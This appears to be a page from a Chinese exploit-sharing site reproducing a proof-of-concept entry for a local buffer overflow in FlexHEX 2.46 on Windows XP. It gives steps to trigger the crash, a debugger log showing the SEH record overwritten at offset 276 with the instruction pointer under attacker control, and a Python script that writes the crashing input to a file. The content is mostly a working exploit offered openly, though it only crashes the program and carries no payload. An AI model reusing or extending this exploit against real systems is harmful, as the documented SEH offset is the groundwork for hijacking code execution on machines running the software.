扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 |
# Exploit Title: FlexHEX v2.46 - Denial of Service (PoC) and SEH overwritten Crash PoC # Discovery by: Rafael Pedrero # Discovery Date: 2018-12-20 # Vendor Homepage: http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1 # Software Link : http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1 # Tested Version: 2.46 # Tested on: Windows XP SP3 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow # Steps to Produce the Crash: # 1.- Run FlexHEX.exe # 2.- Go to Menu "Stream" - "New Stream" and copy content of FlexHEX_SEH_Crash.txt to clipboard # 3.- Paste the content into the field: 'Stream Name:' # 4.- Click 'OK' button and you will see a crash. ''' Log data, item 21 Address=0BADF00D Message=SEH record (nseh field) at 0x0012dde8 overwritten with unicode pattern : 0x006a0041 (offset 276), followed by 20 bytes of cyclic data after the handler SEH chain of main thread AddressSE handler 0012DDFC FlexHEX.00420042 00420042 8BC13B2C 4E8B3C46 *** CORRUPT ENTRY *** EAX 00410041 FlexHEX.00410041 ECX 00000000 EDX 00000000 EBX 0012FA18 ESP 0012DE3C UNICODE "AAAAAAAAAABBBB" EBP 00410041 FlexHEX.00410041 ESI 0012DE78 EDI 0012E69C EIP 00410041 FlexHEX.00410041 C 0ES 0023 32bit 0(FFFFFFFF) P 0CS 001B 32bit 0(FFFFFFFF) A 1SS 0023 32bit 0(FFFFFFFF) Z 0DS 0023 32bit 0(FFFFFFFF) S 0FS 003B 32bit 7FFDF000(FFF) T 0GS 0000 NULL D 0 O 0LastErr ERROR_SUCCESS (00000000) EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0E S P U O Z D I FST 0000Cond 0 0 0 0Err 0 0 0 0 0 0 0 0(GT) FCW 027FPrec NEAR,53Mask1 1 1 1 1 1 ''' #!/usr/bin/env python nseh = "BB" seh = "BB" junk = "\x41" * 276 crash = junk + nseh + seh f = open ("FlexHEX_SEH_Crash.txt", "w") f.write(crash) f.close() |
体验盒子
